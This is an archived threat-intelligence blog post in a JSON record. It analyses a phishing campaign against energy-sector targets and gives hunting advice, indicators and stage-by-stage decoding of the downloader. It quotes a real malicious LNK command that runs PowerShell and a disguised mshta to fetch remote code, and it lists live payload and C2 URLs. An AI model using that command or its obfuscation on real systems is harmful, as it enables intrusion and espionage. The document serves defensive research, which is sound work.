{
	"id": "317e6cb1-26fb-431d-b4b3-045d07c1f327",
	"created_at": "2026-04-06T00:22:34.688574Z",
	"updated_at": "2026-04-10T13:12:53.2663Z",
	"deleted_at": null,
	"sha1_hash": "3fc207e060d1a9dae0c6828ac79caf0ab31b6934",
	"title": "RU APT targeting Energy Infrastructure (Unknown unknowns, part 3)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2589700,
	"plain_text": "RU APT targeting Energy Infrastructure (Unknown unknowns, part 3)\r\nArchived: 2026-04-05 13:57:52 UTC\r\nAttacks on the Energy infrastructure raise an eyebrow, whether they're cyber-physical in nature, or purely espionage. For\r\nthat reason, when StrikeReady Labs identified a targeted spear phishing campaign tailored for the Gas Infrastructure Europe\r\n(GIE) association, we analyzed the content immediately after submission to Virustotal on October 18th. Further pivots\r\nshowed direct targeting, and in some cases compromises, of:\r\nUkraine’s electrical transmission infrastructure\r\nA Slovakian gas storage company\r\nAn American energy brokerage\r\nA Ukrainian international investment organization\r\nA Ukrainian financial auditing organization\r\nAnd other attendees of the aforementioned natural gas conference in Germany\r\nThese targets all have access to sensitive data that would be of interest to a government. This particular campaign has been\r\nongoing since early October '24. The number of energy-specific targets is highly unusual for the majority of APT threat\r\nactors, and the sustained targeting and re-targeting of Ukraine has only seen by Russia-nexus actors. The timing of phishing\r\nnatural gas organizations just before the winter is also difficult to ignore.\r\nTLDR for threat hunters: Look across your logging infrastructure for executions of mshta with an external\r\npayload, and you too could find this\r\nhttps://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/\r\nPage 1 of 8\n\nFigure 1: Initial tweet from Oct 18 '24\r\nWe performed initial triage, as we do daily on our https://bsky.app/profile/strikereadylabs.com and\r\nhttps://x.com/strikereadylabs accounts. You can follow along with our process in Part 1 and Part 2 of this series. 
However, at CYBERWARCON last week, an unnamed analyst flagged us down and chuckled, \"hey, nice Sandworm tweet\", which made us take a second look at this cluster. This post will not focus on the Sandworm-specific attribution, as we do not have the telemetry to independently make that attribution, but rather on how we discovered it, and how you could pivot to find the same types of threats in your own network. Networking IRL FTW.\r\nA member of the infosec community on LinkedIn recently posed the question, \"What's your favorite network hunt?\". One of our analysts responded: if I only had one, \"mshta.exe http\". And that is literally how we found this thread to pull on. There are very few new files you will come across that execute mshta to run remote content, and you can put a pair of eyeballs onto each and every one. It will not take more than a couple of seconds to triage, provided you are logging the appropriate telemetry (process creation with full command lines), and it works equally well against crimeware or APT. As an added bonus, it will only flag on positive detections where you have an \"action item\": mshta fetching remote content is an intermediary stage, so the attacker already has execution on your endpoint but generally has not yet dropped the full payload. All that is to say, it is a great mechanism to find high-fidelity hits. Hopefully you will forgive the wizard behind the curtain for not having a more exciting answer as to how we found one of the more advanced threat groups out there.\r\nFigure 2: execution/hunt paths – credit to the folks at d2lang\r\n1. 
Pivoting on win11signal in the LNK metadata gives us a second LNK, and a pivot on the hosting domain gives us a third.\r\nLNK (sha256) | Assessed name | Hosting domain\r\nb8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73 | GIE Annual Conference 2024 in Munich Voting Result Event.pdf.lnk | adobeprotectcheck.com\r\n806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68 | Заява про витік газу ТОВ ОПЕРАТОР ГТС УКРАЇНИ.pdf.lnk (Gas leak statement LLC GTS OPERATOR UKRAINE.pdf.lnk) | adobeprotectcheck.com\r\nzayavka.lnk | Wireshark Agency.pdf.lnk | adobeprotectcheck.com\r\nFigure 3: additional LNK from adobeprotectcheck\r\nIt is noteworthy that these are WebDAV servers. A small number of groups phish with LNKs hosted on WebDAV servers, particularly ones that use the \"Downloads\" directory. This attacker may be attempting to blend in with the broader criminal crowd. We will use this fact later on to find more infra.\r\n2. The first-stage payload executed by MSHTA is not a standalone HTA at all, but a bunch of EXEs concatenated together with \u003cscript\u003e blocks embedded, which are parsed and executed. The LNK command line is forfiles.exe /p C:\\ /m Windows /c \"powershell . \\*i*\\*2\\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5\"; it relies on wildcard expansion, with \\*i*\\*2\\msh*e standing in for \\Windows\\System32\\mshta.exe, so the string mshta never appears literally on the powershell command line (the mshta.exe process itself still shows up in process-creation telemetry with the URL as its argument). The layers of obfuscation are quite robust, and are referred to by many in the community as Emmenhtal. Here is a small representation of the decoding from the second LNK, 806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68.
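Before the figures, an added worked model of the two layers they show (token substitution, then character codes offset by 950). This is example code written for this page, not the sample's own script and not StrikeReady tooling: the token table, the exact layer layout and the final PowerShell line are constructed for illustration and are not the values from the real sample, whose table is only hinted at by the EW to 102 substitution noted below.

```python
OFFSET = 950  # the per-character offset observed in the second layer

# Constructed substitution table: two-letter tokens standing in for the
# digit/separator alphabet of the next layer. The real table differs.
TOKEN_TABLE = {'EW': '1', 'RT': '0', 'YU': '2', 'IO': '3', 'PA': '4',
               'SD': '5', 'FG': '6', 'HJ': '7', 'KL': '8', 'ZX': '9', 'CV': ','}


def substitute_tokens(blob, table):
    # Layer 1a: replace every two-letter token with its digit (or separator).
    # An unknown token raises, so a wrong table fails loudly instead of
    # yielding garbage that merely looks plausible.
    out = []
    for i in range(0, len(blob), 2):
        tok = blob[i:i + 2]
        if tok not in table:
            raise ValueError(f'unknown token {tok!r} at offset {i}')
        out.append(table[tok])
    return ''.join(out)


def codes_to_text(csv_codes, offset=0):
    # Layer 1b and layer 2: split on commas, subtract the offset, map to chars
    return ''.join(chr(int(c) - offset) for c in csv_codes.split(',') if c)


def decode(blob, table=TOKEN_TABLE, offset=OFFSET):
    layer1 = substitute_tokens(blob, table)   # tokens -> comma-separated codes
    layer2 = codes_to_text(layer1)            # first decode -> list of offset codes
    return codes_to_text(layer2, offset)      # -950 + chr -> the next-stage script


# Encoder, used only to build a self-consistent constructed sample for decode()
def encode(text, table=TOKEN_TABLE, offset=OFFSET):
    rev = {v: k for k, v in table.items()}
    layer2 = ','.join(str(ord(ch) + offset) for ch in text)
    layer1 = ','.join(str(ord(ch)) for ch in layer2)
    return ''.join(rev[ch] for ch in layer1)


# Constructed stand-in for the PowerShell the real chain produces
FINAL_STAGE = '$w=New-Object Net.WebClient;$w.DownloadString($u)'
SAMPLE_BLOB = encode(FINAL_STAGE)

if __name__ == '__main__':
    print(decode(SAMPLE_BLOB))
```

Each layer is kept as its own function because that is how the real analysis proceeds: confirm the substitution output looks like a comma-separated list of integers before guessing at the offset, and check that the offset yields printable characters before treating the result as a script.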
Google Cloud has documented much of this downloader under the name PEAKLIGHT.\r\nFigure 4: initial script embedded in dccw exe\r\nNote the string substitution that turns EW into 102, and so on.\r\nFigure 5: after string substitution and first decode\r\nNext, 950 is subtracted from each code.\r\nFigure 6: after -950 + loop + decode\r\nThe attacker has now moved from JavaScript to PowerShell, which properly decrypts the next stage.\r\nFigure 7: PS created by Figure 6\r\nThe true raison d'être is starting to become clear, and for the reader's sake we have included these scripts in the appendix. The likely payload, ssowoface.dll, and the decoy PDF, Zayava_pro_vitik_gasu.pdf, are now visible. Below we have picked apart the new artifacts. One of these was recently highlighted by researchers at Veriti (nice job!).\r\nurl | sha256\r\ngurt.duna.ua/programy-nauczania/GTSvitikgasuStage5 (dccw.exe) | 9caaa34fa5fab572695f49cc496820dc5e4df6d8866b3f89a49e2dab1a6f85d2\r\ngurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2 (dccw.exe) | 28d2c70bb31fc2be17ff15f5c07eea5f373563970ec210b3af343444222ef167\r\ngurt.duna.ua/programy-nauczania/ssowoface.dll | d4daf30ceee80c4f639f3aff6abeb95e7fbf11e125fb90f8972b7a92e22d22e5\r\ncalendar.stib.com.ua/bestone.php | next stage for both dccw above\r\nertel-audit.com/wp-includes/Zayava_pro_vitik_gasu.pdf (legit domain) | f00c33c89c8468f112a9d54888eb37087e82b0732b7e587371426bfaf397eefa\r\nertel-audit.com/wp-includes/GIE_Annual_Conference_2024_Participant_Form.pdf | b53cf86e6860294fd6731f7db990d7d0f2329893d83f17934836207cf361062f\r\n→ helpdesk.katolik.bydgoszcz.pl/eliot.php\r\nFigure 8: stages from the two LNK mentioned above\r\n3. Pivoting on ssowoface.dll, we see a number of interesting artifacts. 
One is the exposed PDB path C:\\Users\\user\\documents\\visual studio 2015\\Projects\\droper_dll\\Release\\droper_dll.pdb, and another is the DLL entry point DoUpdateInstanceEx. Looking for similar misspellings, we can find droper_exe_for_lnk, and, wouldn't you know it, the C2 for that sample is afi-ukraine.org/wp-includes/bestone.php. Note the bestone similarity to our original sample.\r\nurl | sha256\r\nafi-ukraine.org/wp-includes/bestone.php (legit, compromised site) | 244e004ac7149e2631d68cba947cfd3d5d5352536ecb352c410b6e80e09d874a\r\nFigure 9: additional file beaconing to misspelled PDB\r\n4. Looking for similar C2s, such as \"wp-includes\" + *one.php, another hit pops, and this one also includes ertel-audit.com. Attackers who compromise infrastructure often reuse the same exploit, which is why we might expect to see other C2s hosted on WordPress instances.\r\nfilenames | sha256 | next stage\r\nhosted on paths like protectraid.com/Downloads/Resume.lnk, Resume.pdf.lnk, etc. | 36db27f5eb3343cfc72d261d78da44957a49cb6731acb50a96ea5694f4d616c5, 7f6c6bfe7aaac358ba6ba6b4c4310d3f22ae5562f1876db8d92235d0cc3857ca, 616cf561124ce116e4b61a26e5d2fb4ba68126ba6f3df9a66e71f57f6914292e, 958006c2be14c75ac32c92bb0ff0b71d4b94e9e0f358335ed976952abb772eb0 | furqaanenergy.com/wp-includes/b1tuZmhqZXJba → b1tuZmhqZXJbaGZkYm (legit, compromised site)\r\nЗміни до Закону Про державний бюджет України на 2025 рік.pdf.lnk (Amendments to the Law on the State Budget of Ukraine for 2025.pdf.lnk) | ac71520a18fa7fd5f67d8cb8800c732a3c78bb1e0815bcddfbc120bf9ca86d96 | Like all samples, these w\r\nsimilar portals\r\nДог 205 3132 Ремтехналадка.pdf.lnk (Contract 205 3132 Remtekhnaladka.pdf.lnk) | 30f5db9a7982db6ac1a3f65f4eada76b24e9438c9cf733e7b0bc353e6c5c5a25\r\nFigure 10: pivoting on bestone-like comms\r\n5. ssowoface.dll is quite a unique DLL name. 
A web search finds this sample on Joebox: 4a302c0ed3c47231bc7c34cf2d41bc0ceb60d9c7b0023df015f75a58853f43d2 beacons to protectconnections.com, which, as luck would have it, sat on the same IP as protectraid.com above, which hosted one of the payloads.\r\n6. Looking more at the legitimate ertel-audit.com domain, we can see the file my_resume.pdf communicating with it, which leads us to a second file as well. Let us take a look:\r\nPhish 1 | Phish 2\r\n1be7c11d50e38668e35760f32aac9f9536260d58685d3b88bcb9a276b3e0277a (my_resume.pdf) | a17dc4cb60f398a8880b0a08535b405f546153ad100c381d1c3cc6861f6\r\nFigure 11: two PDF (susp) phishes\r\nTwo of these fake PDFs reach out to ertel-audit.com/wp-includes/caramel.php, and one to helpdesk.katolik.bydgoszcz.pl/bydgoszcz.php?subid=[target]. These PDFs are a blurred-out version of other decoys from this campaign, some of which can be seen in this post from Twitter user https://x.com/byrne_emmy12099/status/1852002306486849587, who has highlighted at least two from this campaign.\r\nOne of those attachments, however, made its way to VT attached to a phish from mykolazhovko@ukr.net.\r\nFigure 12: one of the actual phish emails\r\n7. No hunt is complete without a spin through the DNS. Because sites like adobeprotectcheck.com used WebDAV, they emit an unusual HTTP response code, 207 (Multi-Status), which is defined by WebDAV and rarely returned by ordinary web servers. With help from our friends at Silent Push, we can query their web scanner for Cloudflare-hosted domains that have recently returned a 207, and sort the results by registrar. 
Although this is not a perfect query, the number is small enough to eyeball, and we can expand our set of domains:\r\ndomains: adobeprotectcheck.com, gieannualconferenceinmunich.com, annualgieconferenceinmunich2024.com\r\nNew artifact: gieconferencemunich.html (2281e6acb309afa3be8215672f4e6902f37e24cd75a1ef3168183dd52e5ba7ad)\r\nFigure 13: XML returns\r\nDoing one last sweep through the radius of our indicators, we come across 2e8817478d88cd1b21ecd583567c73333fefe70b445249d939327c50f6648007, which appears to be a custom redirector. Although not inherently malicious, it does allow us to link login.antimailspam.com, which was registered in the same October timeframe on the same registrar. Pivoting in this universe of indicators, we see some Outlook phishing, which leads to more overlaps with crimeware. This may be another attempt to blend into unrelated campaigns.\r\nFigure 14: outlook phishing\r\nVendor | Name\r\nGoogle Cloud | PEAKLIGHT, just for the downloader portion\r\nProofpoint | UNK_OperaEnergy\r\nFigure 15: other vendor-validated names, drop us a note to be included\r\nOur GitHub provides a download of the relevant files mentioned in the blog.\r\nAcknowledgements\r\nThe authors would like to thank the reviewers, as well as peer vendors, for their comments and corrections. Please get in touch at research@strikeready.com if you have corrections, would like us to use your group name, or would like to collaborate on research.\r\nSource: https://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://strikeready.com/blog/ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3/"
	],
	"report_names": [
		"ru-apt-targeting-energy-infrastructure-unknown-unknowns-part-3"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434954,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.pdf",
		"text": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.txt",
		"img": "https://archive.orkl.eu/3fc207e060d1a9dae0c6828ac79caf0ab31b6934.jpg"
	}
}